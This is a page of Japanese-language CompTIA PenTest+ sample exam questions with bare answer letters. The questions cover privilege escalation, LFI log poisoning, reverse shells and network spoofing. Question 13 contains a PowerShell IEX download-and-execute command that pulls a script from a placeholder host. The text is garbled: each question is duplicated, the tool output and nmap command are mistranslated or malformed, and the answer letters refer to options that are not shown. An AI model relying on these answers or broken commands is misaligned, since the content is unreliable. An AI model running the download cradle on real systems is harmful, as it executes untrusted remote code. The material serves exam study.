최신CompTIA PenTest+ Certification Exam (PT0-001日本語版) - PT0-001日本語무료샘플문제
문제1
ペネトレーションテスターは、特定のターゲットの内部ホストへのアクセスを取得しました。 Windows OSのよく知られたアーキテクチャの欠陥を悪用して、マシンのユーザーのパスワードを取得するための最良のツールは次のうちどれですか?
ペネトレーションテスターは、特定のターゲットの内部ホストへのアクセスを取得しました。 Windows OSのよく知られたアーキテクチャの欠陥を悪用して、マシンのユーザーのパスワードを取得するための最良のツールは次のうちどれですか?
정답: C
문제2
侵入テストが開始されたときに通知する重要な利害関係者は次のうちどれですか?
侵入テストが開始されたときに通知する重要な利害関係者は次のうちどれですか?
정답: C
문제3
ペネトレーションテスターは人的資源を呼び出し、自由形式の質問を開始します。ペネトレーションテスターが使用しているソーシャルエンジニアリング手法は次のうちどれですか。
ペネトレーションテスターは人的資源を呼び出し、自由形式の質問を開始します。ペネトレーションテスターが使用しているソーシャルエンジニアリング手法は次のうちどれですか。
정답: B
문제4
ある企業が、コアビジネスアプリケーションのセキュリティを評価するために侵入テストを専門とする会社と契約しました。同社は同社にJavaバイトコードのコピーを提供した。静的コードアナライザーを実行する前に、会社は次のどのステップを踏まなければなりませんか?
ある企業が、コアビジネスアプリケーションのセキュリティを評価するために侵入テストを専門とする会社と契約しました。同社は同社にJavaバイトコードのコピーを提供した。静的コードアナライザーを実行する前に、会社は次のどのステップを踏まなければなりませんか?
정답: D
문제5
Linuxシステムへの最初の低特権アクセスを得た後、ペネトレーションテスターは "changepass"と題されたユーザーのフォルダーの中の興味深いバイナリを識別します
-sr -xr -x 1 root root 6443 2017年10月18日/ home / user / changepass
チェンジパスからのASCII印刷可能文字を印刷するために「文字列」を使用して、テスターは次のように注意します。
$ stringsチェンジパス
出口
setuid
strmp
GLINC _2.0
ENV_PATH
%s / changepw
malloc
強い
この情報を考慮すると、マシン上でroot権限を獲得するための最も可能性の高い利用方法は次のうちどれですか。
Linuxシステムへの最初の低特権アクセスを得た後、ペネトレーションテスターは "changepass"と題されたユーザーのフォルダーの中の興味深いバイナリを識別します
-sr -xr -x 1 root root 6443 2017年10月18日/ home / user / changepass
チェンジパスからのASCII印刷可能文字を印刷するために「文字列」を使用して、テスターは次のように注意します。
$ stringsチェンジパス
出口
setuid
strmp
GLINC _2.0
ENV_PATH
%s / changepw
malloc
強い
この情報を考慮すると、マシン上でroot権限を獲得するための最も可能性の高い利用方法は次のうちどれですか。
정답: D
문제6
Webアプリケーション内のローカルファイルインクルードの脆弱性を悪用した後、制限されたリバースシェルが侵入テスターのワークステーションにスポーンされます。制限されたシェルをエスケープして完全に機能するTTYを作成するために使用できるのは次のうちどれですか。
Webアプリケーション内のローカルファイルインクルードの脆弱性を悪用した後、制限されたリバースシェルが侵入テスターのワークステーションにスポーンされます。制限されたシェルをエスケープして完全に機能するTTYを作成するために使用できるのは次のうちどれですか。
정답: C
문제7
ペネトレーションテスト中に、テスターは悪用されたサーバーで実行されている従来のアンチウイルスを識別します。次の手法のうち、エクスプロイト後のフェーズでの永続性を最も確実にするのはどれですか?
ペネトレーションテスト中に、テスターは悪用されたサーバーで実行されている従来のアンチウイルスを識別します。次の手法のうち、エクスプロイト後のフェーズでの永続性を最も確実にするのはどれですか?
정답: D
문제8
内部侵入テストの間に、いくつかのマルチキャストおよびブロードキャスト名前解決要求がネットワークを通過するのが観察されます。次のツールのどれがネットワークリソースの偽装や認証要求の収集に使用される可能性がありますか?
内部侵入テストの間に、いくつかのマルチキャストおよびブロードキャスト名前解決要求がネットワークを通過するのが観察されます。次のツールのどれがネットワークリソースの偽装や認証要求の収集に使用される可能性がありますか?
정답: B
문제9
組織がMDMサービスを採用していない場合に、Androidベースの商用モバイルデバイスに存在する感受性について説明しているのは次のうちどれですか?(2つ選択してください。)
組織がMDMサービスを採用していない場合に、Androidベースの商用モバイルデバイスに存在する感受性について説明しているのは次のうちどれですか?(2つ選択してください。)
정답: C,D
문제10
クライアントがペネトレーションテスタに新しいWebアプリケーションの可用性を評価するよう依頼しています。テスターは次の種類の攻撃のうちどれを使用するべきですか?
クライアントがペネトレーションテスタに新しいWebアプリケーションの可用性を評価するよう依頼しています。テスターは次の種類の攻撃のうちどれを使用するべきですか?
정답: B
문제11
WebサーバーはPHPを実行しており、侵入テスターはLFIを使用して、URLを介してパラメーターを渡すことでコマンドを実行しています。これが可能なのは、サーバーログがPHPシステム()関数を実行するためにポイズニングされたためです。次のうちどれがpasswdファイルの内容を取得しますか?
WebサーバーはPHPを実行しており、侵入テスターはLFIを使用して、URLを介してパラメーターを渡すことでコマンドを実行しています。これが可能なのは、サーバーログがPHPシステム()関数を実行するためにポイズニングされたためです。次のうちどれがpasswdファイルの内容を取得しますか?
정답: C
문제12
侵入テスト担当者が、脆弱性スキャンを実行する前に、一部のリモートホストで最初の情報収集を行っています。
テスターは次のコマンドを実行します。
nmap -p 192.168.1.1、192.168.1.2、192.168.1.3 -sV -o --max-rate 2 192.168.1.130
次のうちどれが複数のIPアドレスが指定されているのか説明していますか。
侵入テスト担当者が、脆弱性スキャンを実行する前に、一部のリモートホストで最初の情報収集を行っています。
テスターは次のコマンドを実行します。
nmap -p 192.168.1.1、192.168.1.2、192.168.1.3 -sV -o --max-rate 2 192.168.1.130
次のうちどれが複数のIPアドレスが指定されているのか説明していますか。
정답: B
문제13
次のPowerShellコマンドを検討してください。
powershell.exe
IEX(New-Object Net.Webclient).downloadstring(http:// site /)
script.ps1 "); Invoke-Cmdlet
次のベストのどれがこのコマンドを実行したアクションを説明しますか?
次のPowerShellコマンドを検討してください。
powershell.exe
IEX(New-Object Net.Webclient).downloadstring(http:// site /)
script.ps1 "); Invoke-Cmdlet
次のベストのどれがこのコマンドを実行したアクションを説明しますか?
정답: A
문제14
ペネトレーションテスターは、インターネットに公開され、企業の内部ネットワークにアクセスできるLinuxサーバーにSSHでアクセスできます。このサーバーは、IPアドレスが200.111.111.9で、ポートTCP22のみが外部で開かれています。ペネトレーションテスターは、Windowsサーバーから内部IPアドレス192.168.1.5も検出しました。このWindowsサーバーへのRDP接続を開き、ログオンを試みるために、侵入テスターは次のどの手順に従う必要がありますか?
ペネトレーションテスターは、インターネットに公開され、企業の内部ネットワークにアクセスできるLinuxサーバーにSSHでアクセスできます。このサーバーは、IPアドレスが200.111.111.9で、ポートTCP22のみが外部で開かれています。ペネトレーションテスターは、Windowsサーバーから内部IPアドレス192.168.1.5も検出しました。このWindowsサーバーへのRDP接続を開き、ログオンを試みるために、侵入テスターは次のどの手順に従う必要がありますか?
정답: D